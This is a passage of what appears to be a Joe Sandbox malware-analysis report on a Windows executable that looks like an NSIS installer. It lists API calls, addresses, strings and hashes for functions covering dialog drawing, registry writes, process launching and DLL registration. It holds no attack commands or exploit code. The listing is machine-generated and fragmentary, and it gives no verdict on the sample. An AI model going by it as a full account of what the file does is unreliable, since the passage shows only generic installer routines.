                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                        • API String ID: 20674999-2124804629
                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                        • GetSysColor.USER32(?), ref: 004041DB
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                        • SetCursor.USER32(00000000), ref: 004042FE
                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                        • SetCursor.USER32(00000000), ref: 00404322
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                        • String ID: F$N$open
                                        • API String ID: 3928313111-1104729357
                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                        APIs
                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                        • wsprintfA.USER32 ref: 00406B79
                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                        • API String ID: 565278875-3368763019
                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                        • DeleteObject.GDI32(?), ref: 004010F6
                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                        • DeleteObject.GDI32(?), ref: 0040116E
                                        • EndPaint.USER32(?,?), ref: 00401177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                        • API String ID: 1641139501-220328614
                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3734993849-3206598305
                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                        Strings
                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID: created uninstaller: %d, "%s"
                                        • API String ID: 3294113728-3145124454
                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                        Strings
                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                        • `G, xrefs: 0040246E
                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                        • API String ID: 1033533793-4193110038
                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                        • GetSysColor.USER32(?), ref: 00403E57
                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                        • DeleteObject.GDI32(?), ref: 00403E81
                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                        Strings
                                        • Exec: success ("%s"), xrefs: 00402263
                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                        • Exec: command="%s", xrefs: 00402241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                        • API String ID: 2014279497-3433828417
                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                        • GetMessagePos.USER32 ref: 0040489D
                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
